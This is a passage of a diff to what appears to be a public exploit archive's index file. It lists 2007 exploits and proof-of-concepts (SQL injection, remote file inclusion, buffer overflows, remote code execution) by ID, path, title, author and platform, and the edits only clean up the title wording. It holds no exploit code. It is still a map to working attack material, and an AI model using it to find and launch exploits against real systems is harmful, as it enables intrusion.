+3915,platforms/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 - (g_pcltar_lib_dir) Remote File Inclusion Vulnerabilities",2007-05-13,Mogatil,php,webapps,0 3916,platforms/windows/remote/3916.php,"VImpX ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow Exploit",2007-05-13,rgod,windows,remote,0 3917,platforms/windows/dos/3917.html,"ID Automation Linear Barcode ActiveX Denial of Service Exploit",2007-05-13,shinnai,windows,dos,0 3918,platforms/php/webapps/3918.txt,"phpAtm 1.30 - (downloadfile) Remote File Disclosure",2007-05-13,Ali.Mohajem,php,webapps,0 3919,platforms/php/webapps/3919.txt,"NagiosQL 2005 2.00 - (prepend_adm.php) Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 -3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - (newsadmin.php action) RFI",2007-05-14,Mogatil,php,webapps,0 +3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - (newsadmin.php action) Remote File Inclusion",2007-05-14,Mogatil,php,webapps,0 3921,platforms/windows/dos/3921.html,"Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow PoC",2007-05-14,shinnai,windows,dos,0 3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - (GET Request) Remote Root Exploit (exec-shield)",2007-05-14,Xpl017Elz,linux,remote,8080 3923,platforms/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 -3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog <= 1.4.8a Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 -3925,platforms/windows/remote/3925.py,"TinyIdentD <= 2.2 - Remote Buffer Overflow Exploit",2007-05-14,"Thomas Pollet",windows,remote,113 +3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 +3925,platforms/windows/remote/3925.py,"TinyIdentD 2.2 - Remote Buffer Overflow Exploit",2007-05-14,"Thomas Pollet",windows,remote,113 3926,platforms/windows/dos/3926.py,"Microsoft Windows Vista - Forged ARP packet Network Stack DoS Exploit",2007-05-15,"Kristian Hermansen",windows,dos,0 3927,platforms/windows/remote/3927.html,"DeWizardX (DEWizardAX.ocx) Arbitrary File Overwrite Exploit",2007-05-15,shinnai,windows,remote,0 3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 - (atk.inc config_atkroot) Remote File Inclusion",2007-05-15,Katatafish,php,webapps,0 3929,platforms/windows/dos/3929.txt,"BitsCast 0.13.0 - (invalid string) Remote Denial of Service Exploit",2007-05-15,gbr,windows,dos,0 3930,platforms/windows/dos/3930.txt,"NewzCrawler 1.8 - (invalid string) Remote Denial of Service Exploit",2007-05-15,gbr,windows,dos,0 -3931,platforms/php/webapps/3931.htm,"XOOPS Module resmanager <= 1.21 - Blind SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 -3932,platforms/php/webapps/3932.pl,"XOOPS Module Glossarie <= 1.7 - (sid) Remote SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 +3931,platforms/php/webapps/3931.htm,"XOOPS Module resmanager 1.21 - Blind SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 +3932,platforms/php/webapps/3932.pl,"XOOPS Module Glossarie 1.7 - (sid) SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 3933,platforms/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 - (index.php) SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 3934,platforms/windows/remote/3934.py,"Eudora 7.1 SMTP ResponseRemote Remote Buffer Overflow Exploit",2007-05-15,h07,windows,remote,0 3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 custom_vars.php Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps,0 @@ -3595,54 +3595,54 @@ id,file,description,date,author,platform,type,port 3939,platforms/windows/dos/3939.py,"CA BrightStor Backup 11.5.2.0 caloggderd.exe Denial of Service Exploit",2007-05-16,Shirkdog,windows,dos,0 3940,platforms/windows/dos/3940.py,"CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service Exploit",2007-05-16,Shirkdog,windows,dos,0 3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion Vulnerabilities",2007-05-16,kezzap66345,php,webapps,0 -3942,platforms/php/webapps/3942.pl,"SimpNews <= 2.40.01 - (print.php newnr) Remote SQL Injection Exploit",2007-05-16,Silentz,php,webapps,0 -3943,platforms/php/webapps/3943.pl,"FAQEngine <= 4.16.03 - (question.php questionref) SQL Injection Exploit",2007-05-16,Silentz,php,webapps,0 -3944,platforms/php/webapps/3944.txt,"Mambo com_yanc 1.4 beta (id) Remote SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0 -3945,platforms/linux/dos/3945.rb,"MagicISO <= 5.4 (build239) - (.cue) Heap Overflow PoC",2007-05-17,n00b,linux,dos,0 +3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - (print.php newnr) SQL Injection Exploit",2007-05-16,Silentz,php,webapps,0 +3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - (question.php questionref) SQL Injection Exploit",2007-05-16,Silentz,php,webapps,0 +3944,platforms/php/webapps/3944.txt,"Mambo com_yanc 1.4 beta (id) SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0 +3945,platforms/linux/dos/3945.rb,"MagicISO 5.4 (build239) - (.cue) Heap Overflow PoC",2007-05-17,n00b,linux,dos,0 3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0 3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion Vulnerabilities",2007-05-17,"Alkomandoz Hacker",php,webapps,0 -3948,platforms/php/webapps/3948.txt,"Libstats <= 1.0.3 - (template_csv.php) Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0 +3948,platforms/php/webapps/3948.txt,"Libstats 1.0.3 - (template_csv.php) Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0 3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - (index.php lang) Local File Inclusion",2007-05-18,MurderSkillz,php,webapps,0 3950,platforms/windows/remote/3950.html,"LeadTools JPEG 2000 COM Object Remote Stack Overflow Exploit",2007-05-18,shinnai,windows,remote,0 3951,platforms/windows/remote/3951.html,"LeadTools Thumbnail Browser Control (lttmb14E.ocx) Remote BoF Exploit",2007-05-18,shinnai,windows,remote,0 3952,platforms/windows/remote/3952.html,"LeadTools Raster Thumbnail Object Library (LTRTM14e.DLL) BoF Exploit",2007-05-18,shinnai,windows,remote,0 3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 - (root) Remote File Inclusion Vulnerabilities",2007-05-19,"Mehmet Ince",php,webapps,0 3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 - Auth Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69 -3955,platforms/php/webapps/3955.py,"Zomplog <= 3.8 - (mp3playlist.php speler) Remote SQL Injection Exploit",2007-05-20,NeoMorphS,php,webapps,0 -3956,platforms/php/webapps/3956.php,"AlstraSoft E-Friends <= 4.21 Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 +3955,platforms/php/webapps/3955.py,"Zomplog 3.8 - (mp3playlist.php speler) SQL Injection Exploit",2007-05-20,NeoMorphS,php,webapps,0 +3956,platforms/php/webapps/3956.php,"AlstraSoft E-Friends 4.21 Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 3957,platforms/php/webapps/3957.php,"AlstraSoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 -3958,platforms/php/webapps/3958.php,"AlstraSoft Template Seller Pro <= 3.25 Admin Password Change Exploit",2007-05-20,BlackHawk,php,webapps,0 -3959,platforms/php/webapps/3959.php,"AlstraSoft Template Seller Pro <= 3.25 - Remote Code Execution Exploit",2007-05-20,BlackHawk,php,webapps,0 +3958,platforms/php/webapps/3958.php,"AlstraSoft Template Seller Pro 3.25 Admin Password Change Exploit",2007-05-20,BlackHawk,php,webapps,0 +3959,platforms/php/webapps/3959.php,"AlstraSoft Template Seller Pro 3.25 - Remote Code Execution Exploit",2007-05-20,BlackHawk,php,webapps,0 3960,platforms/php/webapps/3960.php,"WordPress 2.1.3 - admin-ajax.php SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0 3961,platforms/windows/remote/3961.html,"LeadTools Raster Variant (LTRVR14e.dll) Remote File Overwrite Exploit",2007-05-21,shinnai,windows,remote,0 3962,platforms/php/webapps/3962.txt,"Ol Bookmarks Manager 0.7.4 - (root) Remote File Inclusion Vulnerabilities",2007-05-21,"ThE TiGeR",php,webapps,0 -3963,platforms/php/webapps/3963.txt,"TutorialCMS <= 1.01 - Authentication Bypass",2007-05-21,Silentz,php,webapps,0 -3964,platforms/php/webapps/3964.txt,"Ol Bookmarks Manager 0.7.4 - Remote SQL Injection",2007-05-21,"Mehmet Ince",php,webapps,0 +3963,platforms/php/webapps/3963.txt,"TutorialCMS 1.01 - Authentication Bypass",2007-05-21,Silentz,php,webapps,0 +3964,platforms/php/webapps/3964.txt,"Ol Bookmarks Manager 0.7.4 - SQL Injection",2007-05-21,"Mehmet Ince",php,webapps,0 3965,platforms/windows/dos/3965.pl,"Microsoft IIS 6.0 - (/AUX/.aspx) Remote Denial of Service Exploit",2007-05-21,kingcope,windows,dos,0 3966,platforms/windows/remote/3966.php,"Pegasus ImagN ActiveX Control Remote Buffer Overflow Exploit",2007-05-21,rgod,windows,remote,0 3967,platforms/windows/remote/3967.html,"Virtual CD 9.0.0.2 - (vc9api.DLL) Remote Shell Commands Execution Exploit",2007-05-21,rgod,windows,remote,0 -3968,platforms/windows/remote/3968.html,"KSign KSignSWAT <= 2.0.3.3 - ActiveX Control Remote BoF Exploit",2007-05-22,"KIM Kee-hong",windows,remote,0 +3968,platforms/windows/remote/3968.html,"KSign KSignSWAT 2.0.3.3 - ActiveX Control Remote BoF Exploit",2007-05-22,"KIM Kee-hong",windows,remote,0 3969,platforms/windows/dos/3969.html,"LeadTools ISIS Control - (ltisi14E.ocx v.14.5.0.44) Remote DoS Exploit",2007-05-22,shinnai,windows,dos,0 -3970,platforms/php/webapps/3970.txt,"BtiTracker <= 1.4.1 - (become admin) Remote SQL Injection",2007-05-22,m@ge|ozz,php,webapps,0 +3970,platforms/php/webapps/3970.txt,"BtiTracker 1.4.1 - (become admin) SQL Injection",2007-05-22,m@ge|ozz,php,webapps,0 3971,platforms/php/webapps/3971.php,"NavBoard 2.6.0 - Remote Code Execution Exploit",2007-05-23,Dj7xpl,php,webapps,0 3972,platforms/php/webapps/3972.txt,"Scallywag (template.php path) Remote File Inclusion Vulnerabilities",2007-05-23,"Mehmet Ince",php,webapps,0 3973,platforms/windows/dos/3973.html,"Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote DoS Exploit",2007-05-23,shinnai,windows,dos,0 -3974,platforms/php/webapps/3974.pl,"Dokeos <= 1.8.0 - (my_progress.php course) Remote SQL Injection Exploit",2007-05-23,Silentz,php,webapps,0 -3975,platforms/windows/local/3975.c,"MagicISO <= 5.4 (build239) - .cue File Local Buffer Overflow Exploit",2007-05-23,vade79,windows,local,0 +3974,platforms/php/webapps/3974.pl,"Dokeos 1.8.0 - (my_progress.php course) SQL Injection Exploit",2007-05-23,Silentz,php,webapps,0 +3975,platforms/windows/local/3975.c,"MagicISO 5.4 (build239) - .cue File Local Buffer Overflow Exploit",2007-05-23,vade79,windows,local,0 3976,platforms/windows/dos/3976.pl,"Microsoft Visual Basic 6.0 Project (Company Name) Stack Overflow PoC",2007-05-23,UmZ,windows,dos,0 3977,platforms/windows/dos/3977.pl,"Microsoft Visual Basic 6.0 Project (Description) Stack Overflow PoC",2007-05-23,UmZ,windows,dos,0 -3978,platforms/windows/dos/3978.pl,"UltraISO <= 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow PoC",2007-05-24,n00b,windows,dos,0 +3978,platforms/windows/dos/3978.pl,"UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow PoC",2007-05-24,n00b,windows,dos,0 3979,platforms/windows/dos/3979.html,"LeadTools Raster Dialog File Object ActiveX Remote Buffer Overflow PoC",2007-05-24,shinnai,windows,dos,0 -3980,platforms/php/webapps/3980.pl,"Dokeos <= 1.6.5 - (courseLog.php scormcontopen) SQL Injection Exploit",2007-05-24,Silentz,php,webapps,0 -3981,platforms/php/webapps/3981.php,"cpCommerce <= 1.1.0 - (category.php id_category) SQL Injection Exploit",2007-05-24,Kacper,php,webapps,0 +3980,platforms/php/webapps/3980.pl,"Dokeos 1.6.5 - (courseLog.php scormcontopen) SQL Injection Exploit",2007-05-24,Silentz,php,webapps,0 +3981,platforms/php/webapps/3981.php,"cpCommerce 1.1.0 - (category.php id_category) SQL Injection Exploit",2007-05-24,Kacper,php,webapps,0 3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP Service Control Remote BoF Exploit",2007-05-24,rgod,windows,remote,0 3983,platforms/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusion Vulnerabilities",2007-05-24,DeltahackingTEAM,php,webapps,0 3984,platforms/windows/remote/3984.html,"Dart Communications PowerTCP ZIP Compression Remote BoF Exploit",2007-05-25,rgod,windows,remote,0 -3985,platforms/osx/local/3985.txt,"Mac OS X <= 10.4.8 - pppd Plugin Loading Privilege Escalation Exploit",2007-05-25,qaaz,osx,local,0 +3985,platforms/osx/local/3985.txt,"Mac OS X 10.4.8 - pppd Plugin Loading Privilege Escalation Exploit",2007-05-25,qaaz,osx,local,0 3986,platforms/windows/dos/3986.html,"LeadTools Raster Dialog File_D Object Remote Buffer Overflow Exploit",2007-05-25,shinnai,windows,dos,0 3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 - (class.php root) Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0 -3988,platforms/php/webapps/3988.php,"gCards <= 1.46 SQL Injection/Remote Code Execution Exploit",2007-05-25,Silentz,php,webapps,0 -3989,platforms/php/webapps/3989.pl,"My Little Forum <= 1.7 - (user.php id) Remote SQL Injection Exploit",2007-05-25,Silentz,php,webapps,0 +3988,platforms/php/webapps/3988.php,"gCards 1.46 SQL Injection/Remote Code Execution Exploit",2007-05-25,Silentz,php,webapps,0 +3989,platforms/php/webapps/3989.pl,"My Little Forum 1.7 - (user.php id) SQL Injection Exploit",2007-05-25,Silentz,php,webapps,0 3990,platforms/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 - (root) Remote File Inclusion Vulnerabilities",2007-05-25,"Cold Zero",php,webapps,0 3991,platforms/php/webapps/3991.txt,"OpenBASE 0.6a (root_prefix) Remote File Inclusion Vulnerabilities",2007-05-25,DeltahackingTEAM,php,webapps,0 3992,platforms/php/webapps/3992.txt,"FlaP 1.0b (pachtofile) Remote File Inclusion Vulnerabilities",2007-05-25,"Mehmet Ince",php,webapps,0 @@ -3651,16 +3651,16 @@ id,file,description,date,author,platform,type,port 3995,platforms/php/webapps/3995.txt,"TROforum 0.1 - (admin.php site_url) Remote File Inclusion",2007-05-26,"Mehmet Ince",php,webapps,0 3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite - Remote Overflow Exploit (Windows 2003)",2007-05-26,fabio/b0x,windows,remote,80 3997,platforms/php/webapps/3997.txt,"Frequency Clock 0.1b (securelib) Remote File Inclusion Vulnerabilities",2007-05-27,"ThE TiGeR",php,webapps,0 -3998,platforms/php/webapps/3998.php,"Fundanemt <= 2.2.0 - (spellcheck.php) Remote Code Execution Exploit",2007-05-27,Kacper,php,webapps,0 +3998,platforms/php/webapps/3998.php,"Fundanemt 2.2.0 - (spellcheck.php) Remote Code Execution Exploit",2007-05-27,Kacper,php,webapps,0 3999,platforms/php/webapps/3999.txt,"Vistered Little 1.6a (skin) Remote File Disclosure",2007-05-28,GoLd_M,php,webapps,0 -4000,platforms/php/webapps/4000.txt,"wanewsletter <= 2.1.3 - Remote File Inclusion",2007-05-28,Mogatil,php,webapps,0 -4001,platforms/windows/local/4001.cpp,"UltraISO <= 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow Exploit",2007-05-28,n00b,windows,local,0 -4002,platforms/windows/local/4002.py,"UltraISO <= 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow Exploit (2)",2007-05-28,"Thomas Pollet",windows,local,0 -4003,platforms/php/webapps/4003.sh,"Joomla Component Phil-a-Form <= 1.2.0.0 - SQL Injection Exploit",2007-05-28,CypherXero,php,webapps,0 +4000,platforms/php/webapps/4000.txt,"wanewsletter 2.1.3 - Remote File Inclusion",2007-05-28,Mogatil,php,webapps,0 +4001,platforms/windows/local/4001.cpp,"UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow Exploit",2007-05-28,n00b,windows,local,0 +4002,platforms/windows/local/4002.py,"UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow Exploit (2)",2007-05-28,"Thomas Pollet",windows,local,0 +4003,platforms/php/webapps/4003.sh,"Joomla Component Phil-a-Form 1.2.0.0 - SQL Injection Exploit",2007-05-28,CypherXero,php,webapps,0 4004,platforms/php/webapps/4004.php,"Inout Search Engine - Remote Code Execution Exploit",2007-05-29,BlackHawk,php,webapps,0 -4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 - (live_status.lib.php ROOT) RFI",2007-05-29,"ThE TiGeR",php,webapps,0 +4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 - (live_status.lib.php ROOT) Remote File Inclusion",2007-05-29,"ThE TiGeR",php,webapps,0 4006,platforms/php/webapps/4006.php,"Pheap 2.0 Admin Bypass / Remote Code Execution Exploit",2007-05-29,Silentz,php,webapps,0 -4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 - (tr) Remote SQL Injection",2007-05-30,BAHADIR,asp,webapps,0 +4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 - (tr) SQL Injection",2007-05-30,BAHADIR,asp,webapps,0 4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker ActiveX File Download/Overwrite Exploit",2007-05-30,shinnai,windows,remote,0 4009,platforms/windows/dos/4009.html,"EDraw Office Viewer Component Denial of Service Exploit",2007-05-30,shinnai,windows,dos,0 4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0 @@ -3669,30 +3669,30 @@ id,file,description,date,author,platform,type,port 4013,platforms/osx/local/4013.txt,"Mac OS X < 2007-005 - (vpnd) Local Privilege Escalation Exploit",2007-05-30,"Kevin Finisterre",osx,local,0 4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - (IMAP FLAGS) Remote SEH Overwrite Exploit (0Day)",2007-05-30,h07,windows,remote,0 4015,platforms/windows/remote/4015.html,"Vivotek Motion Jpeg Control (MjpegDecoder.dll 2.0.0.13) Remote Exploit",2007-05-31,rgod,windows,remote,0 -4016,platforms/windows/remote/4016.sh,"Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit",2007-05-31,Sha0,windows,remote,0 +4016,platforms/windows/remote/4016.sh,"Microsoft IIS 5.1 Hit Highlighting Authentication Bypass Exploit",2007-05-31,Sha0,windows,remote,0 4017,platforms/windows/dos/4017.cpp,"Acoustica MP3 CD Burner 4.32 - Local Buffer Overflow PoC",2007-05-31,n00b,windows,dos,0 -4019,platforms/php/webapps/4019.php,"Particle Gallery <= 1.0.1 - Remote SQL Injection Exploit",2007-06-01,Silentz,php,webapps,0 -4020,platforms/php/webapps/4020.php,"RevokeBB <= 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0 +4019,platforms/php/webapps/4019.php,"Particle Gallery 1.0.1 - SQL Injection Exploit",2007-06-01,Silentz,php,webapps,0 +4020,platforms/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0 4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker ActiveX (sasatl.dll) Remote BoF Exploit",2007-06-01,shinnai,windows,remote,0 4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion Exploit",2007-06-01,GoLd_M,php,webapps,0 4023,platforms/windows/remote/4023.html,"Microsoft Internet Explorer 6 / Provideo Camimage - (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit",2007-06-02,rgod,windows,remote,0 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional - .PLF file Buffer Overflow Exploit",2007-06-02,n00b,windows,local,0 -4025,platforms/php/webapps/4025.php,"Quick.Cart <= 2.2 - RFI/LFI Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0 -4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) Remote SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0 +4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - RFI/LFI Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0 +4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0 4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080 4028,platforms/linux/local/4028.txt,"Screen 4.0.3 (OpenBSD) - Local Authentication Bypass",2008-06-18,Rembrandt,linux,local,0 -4029,platforms/php/webapps/4029.php,"Sendcard <= 3.4.1 - (Local File Inclusion) Remote Code Execution Exploit",2007-06-04,Silentz,php,webapps,0 -4030,platforms/php/webapps/4030.php,"EQdkp <= 1.3.2 - (listmembers.php rank) Remote SQL Injection Exploit",2007-06-04,Silentz,php,webapps,0 +4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution Exploit",2007-06-04,Silentz,php,webapps,0 +4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - (listmembers.php rank) SQL Injection Exploit",2007-06-04,Silentz,php,webapps,0 4031,platforms/php/webapps/4031.txt,"Madirish Webmail 2.0 - (addressbook.php) Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,php,webapps,0 4032,platforms/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration Exploit",2007-06-04,bunker,tru64,remote,0 -4033,platforms/windows/dos/4033.rb,"SNMPc <= 7.0.18 - Remote Denial of Service Exploit (Metasploit)",2007-06-04,"En Douli",windows,dos,0 +4033,platforms/windows/dos/4033.rb,"SNMPc 7.0.18 - Remote Denial of Service Exploit (Metasploit)",2007-06-04,"En Douli",windows,dos,0 4034,platforms/php/webapps/4034.txt,"Kravchuk letter script 1.0 - (scdir) Remote File Inclusion Vulnerabilities",2007-06-05,"Mehmet Ince",php,webapps,0 -4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 - (index.php epi) Remote SQL Injection",2007-06-05,s0cratex,php,webapps,0 -4036,platforms/php/webapps/4036.php,"PBLang <= 4.67.16.a Remote Code Execution Exploit",2007-06-06,Silentz,php,webapps,0 -4037,platforms/php/webapps/4037.pl,"Comicsense 0.2 - (index.php epi) Remote SQL Injection Exploit",2007-06-06,Silentz,php,webapps,0 +4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 - (index.php epi) SQL Injection",2007-06-05,s0cratex,php,webapps,0 +4036,platforms/php/webapps/4036.php,"PBLang 4.67.16.a Remote Code Execution Exploit",2007-06-06,Silentz,php,webapps,0 +4037,platforms/php/webapps/4037.pl,"Comicsense 0.2 - (index.php epi) SQL Injection Exploit",2007-06-06,Silentz,php,webapps,0 4038,platforms/multiple/dos/4038.pl,"DRDoS - Distributed Reflection Denial of Service",2007-06-06,whoppix,multiple,dos,0 -4039,platforms/php/webapps/4039.txt,"WordPress 2.2 - (xmlrpc.php) Remote SQL Injection Exploit",2007-06-06,Slappter,php,webapps,0 -4040,platforms/asp/webapps/4040.txt,"Kartli Alisveris Sistemi 1.0 - Remote SQL Injection",2007-06-06,kerem125,asp,webapps,0 +4039,platforms/php/webapps/4039.txt,"WordPress 2.2 - (xmlrpc.php) SQL Injection Exploit",2007-06-06,Slappter,php,webapps,0 +4040,platforms/asp/webapps/4040.txt,"Kartli Alisveris Sistemi 1.0 - SQL Injection",2007-06-06,kerem125,asp,webapps,0 4041,platforms/php/webapps/4041.htm,"NewsSync for phpBB 1.5.0rc6 - Remote File Inclusion Exploit",2007-06-07,GoLd_M,php,webapps,0 4042,platforms/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow Exploit",2007-06-07,Excepti0n,windows,remote,0 4043,platforms/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow Exploit 2",2007-06-07,Excepti0n,windows,remote,0 @@ -3705,7 +3705,7 @@ id,file,description,date,author,platform,type,port 4051,platforms/windows/local/4051.rb,"MoviePlay 4.76 - (.lst) Local Buffer Overflow Exploit",2007-06-08,n00b,windows,local,0 4052,platforms/windows/remote/4052.c,"Yahoo! Messenger Webcam 8.1 - (Ywcvwr.dll) Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 4053,platforms/windows/remote/4053.c,"Yahoo! Messenger Webcam 8.1 - (Ywcupl.dll) Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 -4054,platforms/php/webapps/4054.php,"e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit",2007-06-08,Silentz,php,webapps,0 +4054,platforms/php/webapps/4054.php,"e-Vision CMS 2.02 SQL Injection/Remote Code Execution Exploit",2007-06-08,Silentz,php,webapps,0 4055,platforms/php/webapps/4055.htm,"PHP Real Estate Classifieds Remote File Inclusion Exploit",2007-06-09,"not sec group",php,webapps,0 4056,platforms/windows/dos/4056.html,"Internet Download Accelerator 5.2 - Remote Buffer Overflow PoC",2007-06-09,DeltahackingTEAM,windows,dos,0 4057,platforms/asp/webapps/4057.txt,"GeometriX Download Portal - (down_indir.asp id) SQL Injection",2007-06-09,CyberGhost,asp,webapps,0 @@ -3713,26 +3713,26 @@ id,file,description,date,author,platform,type,port 4059,platforms/php/webapps/4059.txt,"Link Request Contact Form 3.4 - Remote Code Execution",2007-06-11,CorryL,php,webapps,0 4060,platforms/windows/remote/4060.html,"TEC-IT TBarCode - OCX ActiveX Remote Arbitrary File Overwrite Exploit",2007-06-12,shinnai,windows,remote,0 4061,platforms/windows/remote/4061.html,"Safari 3 for Windows Beta Remote Command Execution PoC",2007-06-12,"Thor Larholm",windows,remote,0 -4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 - (low.php topic) Remote SQL Injection Exploit",2007-06-12,Silentz,php,webapps,0 +4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 - (low.php topic) SQL Injection Exploit",2007-06-12,Silentz,php,webapps,0 4063,platforms/php/webapps/4063.txt,"xoops module tinycontent 1.5 - Remote File Inclusion",2007-06-12,Sp[L]o1T,php,webapps,0 -4064,platforms/php/webapps/4064.txt,"xoops module horoscope <= 2.0 - Remote File Inclusion",2007-06-12,BeyazKurt,php,webapps,0 +4064,platforms/php/webapps/4064.txt,"xoops module horoscope 2.0 - Remote File Inclusion",2007-06-12,BeyazKurt,php,webapps,0 4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX Control - Remote BoF Exploit (Windows 2000 SP4)",2007-06-13,rgod,windows,remote,0 4066,platforms/windows/remote/4066.html,"Microsoft Speech API ActiveX Control - Remote BoF Exploit (Windows XP SP2)",2007-06-13,rgod,windows,remote,0 4067,platforms/windows/dos/4067.html,"Microsoft Office MSODataSourceControl COM-object BoF PoC (0Day)",2007-06-13,"YAG KOHHA",windows,dos,0 4068,platforms/php/webapps/4068.txt,"XOOPS Module XFsection (modify.php) Remote File Inclusion",2007-06-13,Sp[L]o1T,php,webapps,0 -4069,platforms/php/webapps/4069.txt,"XOOPS Module XT-Conteudo - (spaw_root) RFI",2007-06-13,g00ns,php,webapps,0 +4069,platforms/php/webapps/4069.txt,"XOOPS Module XT-Conteudo - (spaw_root) Remote File Inclusion",2007-06-13,g00ns,php,webapps,0 4070,platforms/php/webapps/4070.txt,"xoops module cjay content 3 - Remote File Inclusion",2007-06-13,g00ns,php,webapps,0 -4071,platforms/php/webapps/4071.txt,"Sitellite CMS <= 4.2.12 - (559668.php) Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 +4071,platforms/php/webapps/4071.txt,"Sitellite CMS 4.2.12 - (559668.php) Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 4072,platforms/php/webapps/4072.txt,"PHP::HTML 0.6.4 - (phphtml.php) Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 4074,platforms/php/webapps/4074.txt,"phpMyInventory 2.8 - (global.inc.php) Remote File Inclusion",2007-06-16,o0xxdark0o,php,webapps,0 4075,platforms/php/webapps/4075.txt,"YourFreeScreamer 1.0 - (serverPath) Remote File Inclusion",2007-06-17,Crackers_Child,php,webapps,0 4076,platforms/php/webapps/4076.php,"MiniBB 2.0.5 - (language) Local File Inclusion Exploit",2007-06-17,Dj7xpl,php,webapps,0 -4078,platforms/php/webapps/4078.php,"Solar Empire <= 2.9.1.1 - BlindSQL Injection / Hash Retrieve Exploit",2007-06-18,BlackHawk,php,webapps,0 